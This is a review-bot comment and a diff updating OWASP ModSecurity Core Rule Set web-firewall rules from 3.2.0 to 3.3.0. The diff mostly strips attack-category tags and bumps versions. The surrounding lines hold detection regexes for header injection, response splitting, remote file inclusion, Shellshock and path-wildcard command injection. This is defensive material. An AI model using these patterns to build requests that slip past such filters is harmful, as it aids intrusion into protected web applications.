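Review bot: The rewritten 921130 pattern `\bhttp/\d` in the `@@ -77,15 +76,14 @@` hunk now matches `http/` followed by any digit instead of only `0.9`, `1.0` and `1.1`, but nothing in the hunk records why the version restriction was dropped or that the rule now fires on `http/2`, `http/3` and any other digit in cookie, argument and XML values. Since the target list includes all of ARGS, ordinary submitted text such as `supports http/2` will now trigger the rule where it previously did not, so the widening deserves a rationale next to the rule, e.g. `# Match any HTTP version token (HTTP/2 and HTTP/3 included), not only 0.9 and 1.x; a version digit after "http/" is the splitting marker, the exact version is irrelevant`, plus a regression test pair covering an `http/2` match and a benign version-like string. The rule's action list continues past the end of the hunk, so its transformations and severity could not be checked here.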
@@ -99,9 +97,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'attack-protocol',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/RESPONSE_SPLITTING',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -134,9 +131,8 @@ SecRule REQUEST_HEADERS_NAMES|REQUEST_HEADERS "@rx [\n\r]" \
 tag:'attack-protocol',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/HEADER_INJECTION',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -163,9 +159,8 @@ SecRule ARGS_NAMES "@rx [\n\r]" \
 tag:'attack-protocol',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/HEADER_INJECTION',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -185,9 +180,8 @@ SecRule ARGS_GET_NAMES|ARGS_GET "@rx [\n\r]+(?:\s|location|refresh|(?:set-)?cook
 tag:'attack-protocol',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/HEADER_INJECTION',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -211,9 +205,8 @@ SecRule REQUEST_FILENAME "@rx [\n\r]" \
 tag:'attack-protocol',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/HTTP_SPLITTING',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -223,7 +216,7 @@ SecRule REQUEST_FILENAME "@rx [\n\r]" \
 # -=[ LDAP Injection ]=-
 #
 # [ Rule Logic ]
-#
+#
 # This is a rule trying to prevent LDAP injection. It is based on a BlackHat presentation by Alonso Parada
 # and regex writing by Denis Kolegov.
 #
@@ -244,7 +237,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'language-ldap',\
 tag:'platform-multi',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -276,9 +269,8 @@ SecRule ARGS_GET "@rx [\n\r]" \
 tag:'attack-protocol',\
 tag:'paranoia-level/2',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/HEADER_INJECTION',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -319,8 +311,7 @@ SecRule ARGS_NAMES "@rx ." \
 tag:'platform-multi',\
 tag:'attack-protocol',\
 tag:'paranoia-level/3',\
- tag:'CAPEC-460',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 setvar:'TX.paramcounter_%{MATCHED_VAR_NAME}=+1'"
 SecRule TX:/paramcounter_.*/ "@gt 1" \
@@ -334,10 +325,8 @@ SecRule TX:/paramcounter_.*/ "@gt 1" \
 tag:'platform-multi',\
 tag:'attack-protocol',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/HTTP_PARAMETER_POLLUTION',\
 tag:'paranoia-level/3',\
- tag:'CAPEC-460',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 chain"
 SecRule MATCHED_VARS_NAMES "@rx TX:paramcounter_(.*)" \
diff --git a/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf b/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf
index 77bc61740..48f9aeeb2 100644
--- a/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf
+++ b/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf
@@ -1,6 +1,6 @@
 # ------------------------------------------------------------------------
-# OWASP ModSecurity Core Rule Set ver.3.2.0
-# Copyright (c) 2006-2019 Trustwave and contributors. All rights reserved.
+# OWASP ModSecurity Core Rule Set ver.3.3.0
+# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
 #
 # The OWASP ModSecurity Core Rule Set is distributed under
 # Apache Software License (ASL) version 2
@@ -40,8 +40,7 @@ SecRule REQUEST_URI_RAW|ARGS|REQUEST_HEADERS|!REQUEST_HEADERS:Referer|XML:/* "@r
 tag:'attack-lfi',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
 setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}'"
@@ -63,8 +62,7 @@ SecRule REQUEST_URI|ARGS|REQUEST_HEADERS|!REQUEST_HEADERS:Referer|XML:/* "@rx (?
 tag:'attack-lfi',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 multiMatch,\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
@@ -89,11 +87,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'attack-lfi',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/FILE_INJECTION',\
- tag:'WASCTC/WASC-33',\
- tag:'OWASP_TOP_10/A4',\
 tag:'PCI/6.5.4',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -118,11 +113,8 @@ SecRule REQUEST_FILENAME "@pmFromFile restricted-files.data" \
 tag:'attack-lfi',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/FILE_INJECTION',\
- tag:'WASCTC/WASC-33',\
- tag:'OWASP_TOP_10/A4',\
 tag:'PCI/6.5.4',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
diff --git a/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf b/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf
index 3eaa54bc2..cc163b516 100644
--- a/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf
+++ b/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf
@@ -1,6 +1,6 @@
 # ------------------------------------------------------------------------
-# OWASP ModSecurity Core Rule Set ver.3.2.0
-# Copyright (c) 2006-2019 Trustwave and contributors. All rights reserved.
+# OWASP ModSecurity Core Rule Set ver.3.3.0
+# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
 #
 # The OWASP ModSecurity Core Rule Set is distributed under
 # Apache Software License (ASL) version 2
@@ -47,9 +47,8 @@ SecRule ARGS "@rx ^(?i:file|ftps?|https?):\/\/(?:\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1
 tag:'attack-rfi',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/RFI',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.rfi_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -68,9 +67,8 @@ SecRule QUERY_STRING|REQUEST_BODY "@rx (?i)(?:\binclude\s*\([^)]*|mosConfig_abso
 tag:'attack-rfi',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/RFI',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.rfi_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -89,9 +87,8 @@ SecRule ARGS "@rx ^(?i:file|ftps?|https?).*?\?+$" \
 tag:'attack-rfi',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/RFI',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.rfi_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -117,10 +114,9 @@ SecRule ARGS "@rx ^(?i:file|ftps?|https?)://([^/]*).*$" \
 tag:'platform-multi',\
 tag:'attack-rfi',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/RFI',\
 tag:'paranoia-level/2',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.rfi_parameter_%{MATCHED_VAR_NAME}=.%{tx.1}',\
 chain"
diff --git a/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf b/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf
index fbb31b7b8..64566f49c 100644
--- a/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf
+++ b/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf
@@ -1,6 +1,6 @@
 # ------------------------------------------------------------------------
-# OWASP ModSecurity Core Rule Set ver.3.2.0
-# Copyright (c) 2006-2019 Trustwave and contributors. All rights reserved.
+# OWASP ModSecurity Core Rule Set ver.3.3.0
+# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
 #
 # The OWASP ModSecurity Core Rule Set is distributed under
 # Apache Software License (ASL) version 2
@@ -113,12 +113,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'attack-rce',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION',\
- tag:'WASCTC/WASC-31',\
- tag:'OWASP_TOP_10/A1',\
 tag:'PCI/6.5.2',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -151,12 +148,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'attack-rce',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION',\
- tag:'WASCTC/WASC-31',\
- tag:'OWASP_TOP_10/A1',\
 tag:'PCI/6.5.2',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -250,12 +244,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'attack-rce',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION',\
- tag:'WASCTC/WASC-31',\
- tag:'OWASP_TOP_10/A1',\
 tag:'PCI/6.5.2',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -291,12 +282,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'attack-rce',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION',\
- tag:'WASCTC/WASC-31',\
- tag:'OWASP_TOP_10/A1',\
 tag:'PCI/6.5.2',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -328,12 +316,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'attack-rce',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION',\
- tag:'WASCTC/WASC-31',\
- tag:'OWASP_TOP_10/A1',\
 tag:'PCI/6.5.2',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -367,12 +352,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'attack-rce',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION',\
- tag:'WASCTC/WASC-31',\
- tag:'OWASP_TOP_10/A1',\
 tag:'PCI/6.5.2',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -415,12 +397,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'attack-rce',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION',\
- tag:'WASCTC/WASC-31',\
- tag:'OWASP_TOP_10/A1',\
 tag:'PCI/6.5.2',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -468,12 +447,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'attack-rce',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION',\
- tag:'WASCTC/WASC-31',\
- tag:'OWASP_TOP_10/A1',\
 tag:'PCI/6.5.2',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -507,12 +483,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'attack-rce',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION',\
- tag:'WASCTC/WASC-31',\
- tag:'OWASP_TOP_10/A1',\
 tag:'PCI/6.5.2',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -541,12 +514,9 @@ SecRule REQUEST_HEADERS|REQUEST_LINE "@rx ^\(\s*\)\s+{" \
 tag:'attack-rce',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION',\
- tag:'WASCTC/WASC-31',\
- tag:'OWASP_TOP_10/A1',\
 tag:'PCI/6.5.2',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -565,12 +535,9 @@ SecRule ARGS_NAMES|ARGS|FILES_NAMES "@rx ^\(\s*\)\s+{" \
 tag:'attack-rce',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION',\
- tag:'WASCTC/WASC-31',\
- tag:'OWASP_TOP_10/A1',\
 tag:'PCI/6.5.2',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -603,11 +570,8 @@ SecRule FILES|REQUEST_HEADERS:X-Filename|REQUEST_HEADERS:X_Filename|REQUEST_HEAD
 tag:'attack-rce',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION',\
- tag:'WASCTC/WASC-31',\
- tag:'OWASP_TOP_10/A1',\
 tag:'PCI/6.5.2',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -658,13 +622,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'platform-unix',\
 tag:'attack-rce',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION',\
- tag:'WASCTC/WASC-31',\
- tag:'OWASP_TOP_10/A1',\
 tag:'PCI/6.5.2',\
 tag:'paranoia-level/3',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
@@ -692,13 +653,10 @@ SecRule ARGS "@rx (?:/|\\\\)(?:[\?\*]+[a-z/\\\\]+|[a-z/\\\\]+[\?\*]+)" \
 tag:'platform-unix',\
 tag:'attack-rce',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION',\
- tag:'WASCTC/WASC-31',\
- tag:'OWASP_TOP_10/A1',\
 tag:'PCI/6.5.2',\
 tag:'paranoia-level/3',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
diff --git a/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf b/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf
index 2c4233574..a84e9bebe 100644
--- a/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf
+++ b/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf
@@ -1,6 +1,6 @@
 # ------------------------------------------------------------------------
-# OWASP ModSecurity Core Rule Set ver.3.2.0
-# Copyright (c) 2006-2019 Trustwave and contributors. All rights reserved.
+# OWASP ModSecurity Core Rule Set ver.3.3.0
+# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
 #
 # The OWASP ModSecurity Core Rule Set is distributed under
 # Apache Software License (ASL) version 2
@@ -57,10 +57,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'attack-injection-php',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/PHP_INJECTION',\
- tag:'OWASP_TOP_10/A1',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -100,10 +98,8 @@ SecRule FILES|REQUEST_HEADERS:X-Filename|REQUEST_HEADERS:X_Filename|REQUEST_HEAD
 tag:'attack-injection-php',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/PHP_INJECTION',\
- tag:'OWASP_TOP_10/A1',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -126,10 +122,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'attack-injection-php',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/PHP_INJECTION',\
- tag:'OWASP_TOP_10/A1',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 chain"
 SecRule MATCHED_VARS "@pm =" \
@@ -155,10 +149,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'attack-injection-php',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/PHP_INJECTION',\
- tag:'OWASP_TOP_10/A1',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -193,10 +185,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'attack-injection-php',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/PHP_INJECTION',\
- tag:'OWASP_TOP_10/A1',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -223,10 +213,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'attack-injection-php',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/PHP_INJECTION',\
- tag:'OWASP_TOP_10/A1',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -292,10 +280,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F
 tag:'attack-injection-php',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/PHP_INJECTION',\
- tag:'OWASP_TOP_10/A1',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -347,10 +333,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F
 tag:'attack-injection-php',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/PHP_INJECTION',\
- tag:'OWASP_TOP_10/A1',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -404,10 +388,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H
 tag:'attack-injection-php',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/PHP_INJECTION',\
- tag:'OWASP_TOP_10/A1',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -461,10 +443,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F
 tag:'attack-injection-php',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/PHP_INJECTION',\
- tag:'OWASP_TOP_10/A1',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
